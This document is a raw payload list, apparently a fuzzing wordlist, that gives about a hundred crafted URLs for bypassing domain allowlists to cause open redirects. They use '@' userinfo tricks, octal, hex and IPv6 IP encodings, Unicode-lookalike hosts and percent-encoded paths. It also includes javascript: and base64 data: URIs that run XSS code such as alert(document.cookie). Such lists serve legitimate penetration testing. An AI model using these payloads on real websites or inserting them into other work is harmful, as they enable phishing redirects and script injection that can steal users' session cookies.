https://www.whitelisteddomain.tld@google.com/
http://www.whitelisteddomain.tld@0xd8.3856078
https:///whitelisted.com@google.com/%2f%2e%2e
http:www.whitelisteddomain.tld@0xd8.072.54990
https:///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://whitelisted.com@google.com/%2e%2e%2f
//3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
https://www.whitelisteddomain.tld@google.com//
/https:///whitelisted.com@google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@google.com/
////www.whitelisteddomain.tld@google.com/%2f..
http://whitelisted.com@[::ffff:216.58.214.206]
/x:1/:///%01javascript:alert(document.cookie)/
//XY>.7d8T\205pZM@whitelisted.com+@google.com/
http:www.whitelisteddomain.tld@472.314.470.462
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@00330.3856078
http://www.whitelisteddomain.tld@0xd8.072.54990
https://:@google.com\@www.whitelisteddomain.tld
https://whitelisted.com/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http:www.whitelisteddomain.tld@00330.0x3a.54990
jaVAscript://whitelisted.com//%0d%0aalert(1);//
https://%5cwww.whitelisteddomain.tld@google.com
http://google.com:80?@www.whitelisteddomain.tld/
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
http://google.com:80#@www.whitelisteddomain.tld/
//whitelisted.com@https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://www.whitelisteddomain.tld@google.com//
/https://%5cwww.whitelisteddomain.tld@google.com
http://www.whitelisteddomain.tld@472.314.470.462
https://%09/www.whitelisteddomain.tld@google.com
http:www.whitelisteddomain.tld@[::216.58.214.206]
//whitelisted.com+&@google.com#+@whitelisted.com/
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
http:www.whitelisteddomain.tld@0330.072.0326.0316
https:///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
//3H6k7lIAiqjfNeN@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://www.whitelisteddomain.tld@00330.0x3a.54990
//XY>.7d8T\205pZM@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http:whitelisted.com@00330.00072.0000326.00000316
///www.whitelisteddomain.tld@www.google.com/%2e%2e
//XY>.7d8T\205pZM@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https:///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
http://3H6k7lIAiqjfNeN@whitelisted.com@google.com/
https://www.whitelisteddomain.tld@google.com/%2f..
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
//3H6k7lIAiqjfNeN@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
http://XY>.7d8T\205pZM@whitelisted.com@google.com/
//https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////www.whitelisteddomain.tld@www.google.com/%2e%2e
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@whitelisted.com+@google.com/
/https://www.whitelisteddomain.tld@google.com/%2f..
http://3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@0330.072.0326.0316
http://whitelisted.com@00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@[::216.58.214.206]
javascript://https://whitelisted.com/?z=%0Aalert(1)
//www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
\152\141\166\141\163\143\162\151\160\164\072alert(1)
///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
//whitelisted.com+&@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@whitelisted.com/
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
javascript://www.whitelisteddomain.tld?%a0alert%281%29
////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
http://3H6k7lIAiqjfNeN@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://whitelisted.com+&@google.com#+@whitelisted.com/
http://XY>.7d8T\205pZM@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https:///www.whitelisteddomain.tld@www.google.com/%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2e%2e
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
https://www.whitelisteddomain.tld/https://www.google.com/
http://whitelisted.com+&@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@whitelisted.com/
//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
/https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
/https://whitelisted.com@google.com/%2f.//whitelisted.com@google.com/%2f..
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
data:whitelisted.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
